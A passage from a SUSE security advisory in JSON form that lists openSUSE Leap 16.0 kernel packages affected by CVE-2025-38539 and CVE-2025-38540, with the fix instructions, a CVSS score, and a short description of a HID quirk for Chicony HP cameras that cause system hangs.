"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38539",
"url": "https://www.suse.com/security/cve/CVE-2025-38539"
},
{
"category": "external",
"summary": "SUSE Bug 1248211 for CVE-2025-38539",
"url": "https://bugzilla.suse.com/1248211"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38539"
},
{
"cve": "CVE-2025-38540",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38540"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: quirks: Add quirk for 2 Chicony Electronics HP 5MP Cameras\n\nThe Chicony Electronics HP 5MP Cameras (USB ID 04F2:B824 \u0026 04F2:B82C)\nreport a HID sensor interface that is not actually implemented.\nAttempting to access this non-functional sensor via iio_info causes\nsystem hangs as runtime PM tries to wake up an unresponsive sensor.\n\nAdd these 2 devices to the HID ignore list since the sensor interface is\nnon-functional by design and should not be exposed to userspace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
